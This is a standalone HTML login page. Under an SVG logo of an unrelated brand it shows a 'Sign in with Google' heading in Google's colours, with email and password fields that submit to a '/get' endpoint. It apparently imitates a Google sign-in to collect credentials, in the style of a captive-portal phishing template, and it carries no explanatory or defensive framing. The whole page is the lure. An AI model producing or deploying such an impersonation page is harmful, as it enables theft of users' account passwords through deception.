<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #203855;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #203855;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #203855;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
    display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #4D469B;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="256.000000pt" height="72.000000pt" viewBox="0 0 2560.000000 727.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,727.000000) scale(0.100000,-0.100000)"
fill="#203855" stroke="none">
<path d="M1190 7259 c-256 -19 -526 -65 -666 -113 -130 -44 -173 -72 -289
-190 -118 -119 -165 -192 -165 -255 1 -55 33 -116 77 -146 114 -75 417 -70
482 8 7 9 13 32 13 52 0 74 -53 108 -142 94 -71 -12 -145 -10 -164 4 -29 21
-17 59 26 80 90 44 364 81 737 98 1356 64 2789 -381 3886 -1206 707 -532 1195
-1181 1301 -1732 20 -106 23 -286 5 -398 -16 -96 -68 -259 -109 -342 -110
-216 -305 -422 -529 -556 -521 -313 -1287 -378 -2194 -186 l-146 31 -6 172
c-4 94 -10 438 -14 764 l-6 592 196 0 c297 0 610 -32 921 -95 134 -27 328 -85
388 -116 66 -34 108 -77 108 -113 -1 -85 -77 -169 -220 -241 -50 -25 -94 -53
-97 -62 -10 -26 53 -71 131 -95 160 -49 355 15 510 168 112 110 159 239 137
371 -50 286 -367 528 -855 653 -298 76 -597 106 -978 97 l-248 -6 3 362 c2
351 1 364 -21 447 -47 170 -135 341 -200 385 -65 44 -136 25 -172 -45 -23 -45
-69 -221 -99 -380 -37 -200 -52 -329 -65 -579 -7 -139 -17 -255 -22 -260 -5
-4 -92 -22 -193 -41 -804 -143 -1327 -386 -1406 -653 -111 -375 465 -975 1380
-1439 99 -50 181 -91 182 -92 1 -1 7 -66 13 -146 22 -290 63 -384 190 -443 60
-29 228 -31 276 -5 83 46 136 134 156 262 7 42 17 76 23 76 5 0 39 -9 75 -20
190 -59 459 -115 675 -142 140 -17 536 -17 675 0 950 115 1726 575 2044 1211
52 103 106 256 131 371 26 120 31 373 10 505 -55 351 -240 728 -548 1114 -124
155 -466 499 -642 645 -401 334 -802 593 -1305 844 -803 401 -1571 623 -2395
692 -138 11 -700 11 -855 -1z m1504 -3291 c-8 -97 -24 -780 -24 -1020 l0 -238
-52 21 c-172 67 -450 204 -616 303 -409 244 -673 503 -698 686 -5 40 -3 50 20
77 71 84 325 149 732 188 220 21 392 32 531 34 l112 1 -5 -52z"/>
<path d="M7930 6753 c-463 -73 -875 -332 -1129 -711 -49 -72 -67 -119 -87
-220 -38 -195 8 -409 114 -533 l33 -38 -17 -51 c-29 -87 4 -278 56 -325 24
-21 100 -31 128 -16 11 6 45 46 75 88 70 101 85 109 163 89 167 -43 432 -46
609 -7 242 53 470 174 745 394 297 238 469 497 445 671 -9 73 -69 181 -140
252 -81 82 -144 106 -276 108 l-97 1 -27 63 c-51 117 -142 193 -271 226 -58
15 -253 20 -324 9z m-236 -481 c2 -4 -43 -46 -101 -92 -175 -140 -419 -394
-529 -549 -16 -22 -32 -41 -37 -41 -18 0 -47 67 -47 111 0 74 41 141 155 254
181 179 412 324 517 325 20 0 39 -3 42 -8z m888 -82 c163 -61 186 -179 71
-353 -101 -152 -394 -341 -638 -412 -152 -44 -316 -68 -430 -62 -100 4 -195
23 -195 37 0 17 490 507 579 578 255 205 451 273 613 212z"/>
<path d="M11728 4890 c-26 -16 -41 -74 -33 -133 4 -29 44 -167 90 -307 129
-396 144 -462 180 -811 44 -420 43 -603 -1 -640 -12 -10 -22 -4 -57 33 -53 58
-125 178 -294 493 -153 284 -366 612 -468 723 -265 286 -435 108 -530 -553
-73 -511 -109 -1311 -63 -1415 25 -58 122 -120 185 -120 43 0 147 71 171 116
19 37 32 193 47 569 24 636 39 765 85 765 49 0 123 -126 261 -449 107 -248
225 -488 290 -586 69 -104 168 -202 244 -240 81 -40 200 -47 269 -17 170 76
343 383 391 697 23 149 16 448 -14 619 -23 129 -99 442 -132 540 -58 175 -198
402 -340 551 -134 140 -230 196 -281 165z"/>
<path d="M17335 4610 c-18 -20 -18 -23 6 -113 34 -129 32 -271 -5 -422 -28
-114 -170 -543 -341 -1025 -117 -332 -139 -428 -132 -590 14 -340 180 -513
558 -585 103 -19 265 -19 349 0 144 33 350 143 442 236 120 122 181 292 147
412 -24 88 -135 101 -341 40 -195 -57 -292 -81 -380 -94 -96 -13 -143 -1 -174
46 -36 56 -29 92 100 500 78 245 131 452 161 630 31 178 43 412 26 500 -37
196 -260 485 -374 485 -13 0 -32 -9 -42 -20z"/>
<path d="M19522 4585 c-131 -37 -275 -109 -346 -174 -16 -14 -59 -72 -96 -128
-169 -253 -272 -493 -370 -857 -22 -83 -45 -153 -52 -157 -14 -9 -35 1 -107
52 -45 32 -63 39 -103 39 l-48 0 0 -61 c0 -93 52 -332 87 -404 9 -16 26 -42
40 -56 l25 -27 -21 -128 c-43 -270 -39 -356 25 -491 64 -135 174 -226 292
-240 64 -7 97 11 111 64 6 21 11 141 11 273 0 236 10 332 42 398 13 26 17 27
158 43 80 9 286 38 458 64 172 26 316 45 320 41 4 -4 7 -179 7 -389 1 -447 2
-452 83 -484 69 -26 155 -24 217 7 64 31 204 165 238 227 69 128 98 368 79
659 -14 224 -46 460 -77 584 -79 311 -226 631 -391 851 -82 108 -157 180 -265
255 l-71 49 -97 2 c-61 2 -116 -3 -149 -12z m64 -471 c105 -50 189 -241 284
-642 27 -114 48 -207 47 -207 -1 -1 -99 -12 -217 -25 -244 -26 -451 -36 -535
-25 l-57 7 6 51 c37 283 165 632 280 763 42 48 113 94 144 94 8 0 29 -7 48
-16z"/>
<path d="M7390 4547 c-19 -12 -42 -36 -52 -53 -20 -35 -45 -200 -82 -558 -44
-413 -51 -538 -51 -946 0 -412 14 -655 42 -696 35 -55 210 -112 300 -98 84 12
162 92 182 185 31 144 -5 1493 -50 1847 -11 93 -49 207 -87 264 -50 77 -136
100 -202 55z"/>
<path d="M9170 4560 c-617 -35 -1001 -184 -1129 -437 -50 -100 -71 -175 -71
-256 0 -142 53 -248 149 -296 126 -64 262 -85 656 -101 470 -19 562 -34 866
-146 202 -75 290 -122 331 -179 26 -35 29 -47 26 -93 -3 -32 -13 -64 -25 -80
-126 -170 -628 -295 -1118 -279 -389 14 -555 79 -555 220 0 61 45 122 119 160
103 51 182 34 446 -99 l191 -96 91 -5 c235 -14 583 97 583 186 0 92 -366 237
-735 292 -156 23 -389 25 -485 5 -93 -20 -216 -70 -280 -114 -172 -120 -213
-384 -92 -591 145 -248 552 -437 982 -457 387 -18 835 96 1037 264 70 59 118
143 159 277 52 174 43 466 -17 594 -13 26 -58 81 -103 126 -65 65 -101 91
-181 132 -217 111 -450 159 -970 198 -337 26 -449 47 -572 106 -28 14 -43 27
-43 40 0 27 65 66 141 84 192 44 760 92 1339 114 202 8 221 10 310 39 143 47
200 104 200 201 0 93 -40 121 -220 152 -197 33 -757 54 -1030 39z"/>
<path d="M22193 4494 c-32 -32 -30 -48 25 -304 78 -354 96 -537 97 -946 0
-258 -3 -324 -14 -337 -18 -23 -24 -22 -56 11 -47 46 -90 121 -290 506 -245
473 -310 583 -410 694 -58 65 -115 96 -159 88 -53 -10 -168 -71 -219 -116 -63
-56 -77 -86 -143 -307 -143 -484 -242 -947 -273 -1278 -28 -302 -25 -333 36
-404 50 -59 98 -81 177 -81 54 0 69 4 94 25 40 34 60 87 72 195 21 188 89 546
145 770 59 235 110 353 150 348 28 -4 127 -205 245 -498 196 -488 256 -606
369 -717 76 -75 128 -97 227 -98 73 0 87 3 156 38 149 73 271 243 332 462 90
321 96 787 15 1162 -77 355 -270 707 -431 787 -67 34 -111 34 -145 0z"/>
<path d="M15455 4491 c-16 -10 -66 -56 -110 -102 -302 -317 -688 -905 -739
-1126 -52 -231 -36 -506 40 -672 53 -116 171 -270 260 -337 l32 -25 -19 -67
c-48 -164 -141 -542 -173 -702 -73 -366 -99 -617 -100 -936 l-1 -241 30 -43
c71 -102 277 -227 391 -237 94 -8 96 -4 106 173 30 579 60 833 148 1274 37
182 133 586 141 595 3 2 58 13 124 24 218 36 366 93 562 212 239 146 438 365
559 615 122 254 196 625 173 873 -24 264 -142 510 -265 557 -61 23 -102 12
-231 -62 -532 -307 -879 -697 -1129 -1269 -68 -157 -89 -187 -122 -183 -33 4
-85 77 -122 171 -38 95 -35 220 9 347 57 169 139 307 318 538 175 227 234 352
236 507 3 125 -38 166 -118 116z m1184 -705 c61 -64 66 -233 12 -392 -55 -164
-328 -517 -488 -630 -153 -110 -449 -203 -470 -148 -22 57 367 684 591 952
184 220 291 286 355 218z"/>
<path d="M14105 4464 c-22 -3 -107 -11 -190 -20 -82 -8 -256 -26 -385 -39
-129 -13 -320 -29 -425 -34 -104 -6 -218 -13 -253 -15 -78 -5 -102 -23 -102
-79 0 -43 43 -134 85 -179 28 -31 59 -41 182 -63 137 -25 134 -20 80 -156 -25
-63 -64 -162 -87 -221 l-42 -108 -69 0 c-39 0 -78 -4 -88 -10 -46 -24 -62
-223 -27 -338 l19 -63 -67 -132 c-91 -180 -101 -223 -101 -427 0 -133 3 -175
18 -217 27 -77 87 -164 174 -252 97 -97 146 -116 298 -115 129 1 244 24 425
84 274 91 661 276 758 364 32 28 62 89 62 123 -1 74 -108 200 -191 225 -59 17
-202 -1 -539 -67 -202 -40 -311 -57 -375 -58 l-90 -2 1 55 c2 102 135 414 186
438 18 8 106 16 245 23 412 18 551 28 605 47 46 15 53 21 61 52 14 55 3 238
-15 257 -26 25 -87 32 -384 42 -269 10 -364 20 -390 42 -9 7 6 44 59 147 39
75 75 140 80 144 25 16 147 22 472 23 300 1 358 3 408 18 199 59 243 120 180
248 -36 72 -151 185 -233 229 -63 34 -68 35 -185 36 -66 1 -138 0 -160 -2z"/>
<path d="M23375 4370 c-188 -28 -429 -165 -472 -267 -21 -52 -17 -132 12 -189
38 -77 109 -106 164 -68 22 16 23 22 17 77 -6 60 -6 60 33 97 51 49 112 65
231 64 334 -6 821 -250 1136 -569 254 -258 413 -597 391 -835 -7 -80 -33 -128
-90 -167 -162 -109 -497 -143 -833 -82 l-62 11 -7 196 c-5 114 -3 357 3 577
11 357 11 381 -6 414 -36 70 -136 90 -215 43 -36 -20 -87 -99 -118 -182 -53
-139 -108 -415 -131 -649 -7 -72 -17 -131 -22 -131 -11 0 -74 68 -119 127 -51
68 -105 86 -172 59 -42 -18 -63 -50 -86 -133 -28 -100 -33 -196 -15 -281 35
-165 116 -257 370 -417 9 -6 26 -51 40 -106 42 -167 104 -258 188 -276 47 -10
181 0 236 18 39 13 76 64 93 129 l12 47 136 6 c287 11 595 109 797 252 146
104 349 358 418 522 62 148 71 194 71 358 0 166 -14 234 -75 370 -76 170 -267
401 -445 540 -303 236 -720 400 -1127 444 -108 12 -277 12 -353 1z"/>
<path d="M25291 2298 c-88 -15 -151 -94 -151 -187 0 -61 13 -97 48 -135 131
-139 358 -37 340 154 -12 117 -113 190 -237 168z m112 -34 c45 -23 66 -44 88
-86 64 -126 -60 -279 -193 -238 -63 18 -124 84 -133 141 -20 133 121 242 238
183z"/>
<path d="M25270 2110 c0 -100 3 -120 15 -120 11 0 15 12 15 50 0 66 19 66 62
0 31 -47 51 -60 62 -42 3 5 -8 28 -24 52 -26 39 -28 46 -15 60 8 9 15 33 15
53 0 45 -28 67 -87 67 l-43 0 0 -120z"/>
<path d="M24767 1275 c-178 -37 -286 -133 -287 -254 -1 -160 104 -244 409
-331 158 -45 186 -59 195 -96 16 -64 -46 -97 -179 -96 -104 1 -178 19 -290 68
-128 57 -116 63 -113 -62 l3 -109 85 -28 c121 -41 217 -57 338 -57 172 0 303
38 386 110 55 49 76 97 76 176 0 160 -90 234 -385 319 -152 44 -202 67 -217
100 -44 97 234 115 456 30 34 -13 69 -26 79 -30 15 -7 17 2 17 94 l0 101 -33
14 c-129 53 -404 80 -540 51z"/>
<path d="M16793 1272 l-263 -2 0 -480 0 -480 155 0 155 0 0 195 0 195 158 -2
c169 -2 226 8 322 57 90 46 139 128 140 230 0 159 -122 264 -332 283 -40 4
-191 6 -335 4z m298 -204 c46 -20 65 -67 48 -115 -16 -49 -64 -66 -191 -71
l-108 -4 0 107 0 108 108 -5 c64 -3 121 -11 143 -20z"/>
<path d="M18566 805 c-130 -256 -236 -470 -236 -475 0 -6 63 -10 159 -10 l158
0 46 95 46 95 258 0 258 0 50 -95 50 -95 163 0 c89 0 162 3 162 6 0 3 -118
217 -262 475 l-261 469 -178 0 -177 0 -236 -465z m594 -117 c0 -5 -77 -8 -171
-8 -94 0 -169 4 -167 9 2 5 39 83 82 175 l80 166 88 -167 c48 -93 88 -171 88
-175z"/>
<path d="M20740 795 l0 -475 150 0 150 0 0 190 0 190 68 0 c60 0 74 -4 108
-29 61 -44 77 -67 154 -206 40 -72 75 -133 79 -138 4 -4 82 -6 174 -5 l166 3
-94 165 c-74 128 -108 177 -154 220 l-59 56 55 29 c220 115 141 410 -124 464
-35 7 -177 11 -365 11 l-308 0 0 -475z m521 285 c102 -29 119 -134 29 -181
-14 -7 -73 -15 -132 -17 l-108 -5 0 107 0 106 88 0 c48 0 103 -5 123 -10z"/>
<path d="M23000 795 l0 -475 155 0 155 0 0 475 0 475 -155 0 -155 0 0 -475z"/>
</g>
</svg>

  </div>

  <div class="form-container">

    <center><h1>Sign in with <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>
</body>
</html>
